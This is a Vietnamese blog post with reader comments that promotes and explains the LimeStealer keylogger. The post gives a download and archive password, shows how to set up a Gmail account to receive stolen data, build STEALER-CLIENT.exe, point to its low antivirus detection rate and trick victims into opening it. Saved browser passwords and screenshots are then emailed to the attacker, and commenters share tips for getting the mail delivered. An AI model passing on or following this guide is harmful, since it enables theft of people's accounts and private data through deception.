LimeStealer là một Keylogger đơn giản có chức năng đánh cắp Password đã lưu trên trình duyệt. Với thói quen cá nhân bạn thường ‘Remember Password’ vào trình duyệt để tiện lần sau không phải nhập lại. Nhưng đây lại là lỗ hỏng để Hacker có thể đánh cắp tất cả tài khoản của bạn. Khi nạn hân kích hoạt LimeStealer, toàn bộ Password bạn đã lưu trên Chrome, Opera, Firefox… đều được gửi về mail Hacker.
Bên cạnh đó LimeStealer có thể chụp lại màn hình và gửi về Email cho bạn. Khi đó bạn vừa biết được Password vừa xem được nạn nhân đang làm gì trên máy tính.
Danh sách các trình duyệt mà LimeStealer có thể lấy được Password:
- Chrome
- Firefox
- Opera
- Yandex
- Vivaldi
- Chromium
- Comodo
- Xpom
- Orbitum
- Kometa
- Amigo
- Nichrom
- Brave
Download Keylogger LimeStealer v.01
Trước tiên, bạn cần tạo cho mình 1 tài khoản Gmail mới để nhận thông tin từ Keylog. Vì khi cấu hình, LimeStealer sẽ yêu cầu bạn nhập User và Password của Gmail. Do đó, để bảo đảm an toàn thì bạn không nên dùng Gmail chính của mình.
(Password: anonyviet.com)
Tải về và giải nén ra, điền thông tin như hình bên dưới:
- Email: gõ rõ ra là @gmail.com luôn. Ví dụ: [email protected]
- Password: là mật khẩu của Email ở trên
- Smtp: giữ nguyên là smtp.gmail.com
Sau đó nhấn nút Build
Khi đó, phần mềm sẽ tạo ra file tên là: STEALER-CLIENT.exe
(Mình dùng Virustotal quét thử thì chỉ có 28/72 trình diệt virus. Khả năng thành công của bạn là khá cao.)
Nhiệm vụ của bạn là gửi file STEALER-CLIENT.exe cho nạn nhân và dụ dỗ họ mở lên. [Phương pháp dụ dỗ tùy vào trình khéo ăn khéo nói của bạn. Đọc thêm các bài về Social Engineering để nghiên cứu nhé.]
Sau khi nạn nhân kích hoạt, Email của bạn sẽ nhận được 1 mail gửi về như hình bên dưới:
Tất cả Password được lưu trên trình duyệt sẽ gửi về Email cho bạn.
Nếu bạn có thể truy cập vào máy nạn nhân được, thì dùng Công cụ giải mã và hack mật khẩu lưu trữ trên Google Chrome hoặc Tool lấy mật khẩu đã lưu trên trình duyệt WebBrowserPassView để xem Password ngay trên máy tính.
nếu cài cái này thì dữ liệu của mình có bị ảnh hưởng không anh
muốn test thì thử trên máy ảo nha bạn. Đừng chơi trên máy thật
cảm ơn anh ạ
e hiểu rồi, cảm ơn anh
không có td với máy tạo file à ad?
bạn build xong thì kích hoạt STEALER-CLIENT.exe sẽ tác dụng với máy tạo file :))
dùng trên linux được không ad
windows thôi bạn
Google nó chặn ứng dụng không an toàn truy cập gmail thì làm như nào nhỉ AD
bật tính năng này lên nhé: https://myaccount.google.com/lesssecureapps
check được gmail à anh
anh ơi check pass gmail à anh
sao nó chỉ gởi về tài khoản fb chổ mật khẩu thì trắng ạ ad??
có thể do người dùng ko lưu password
xác nhận với 5 tỷ ace ngoài kia là dùng được nha ,nhớ tắt cái tính năng an toàn của google cho tk trước nhe ,không al2 không gởi mail được ,nó nhanh như điện vậy .
bác chỉ e tắt cái goog với dc k ạ
an toàn ko
keylog mà bạn hỏi an toàn ko thì ai mà trả lời dc
nó gửi về mỗi tài khoản đã lưu thôi hả ad
ko lưu thì ko được à
tài khoản nào đã save password trên chrome thì bị lấy hết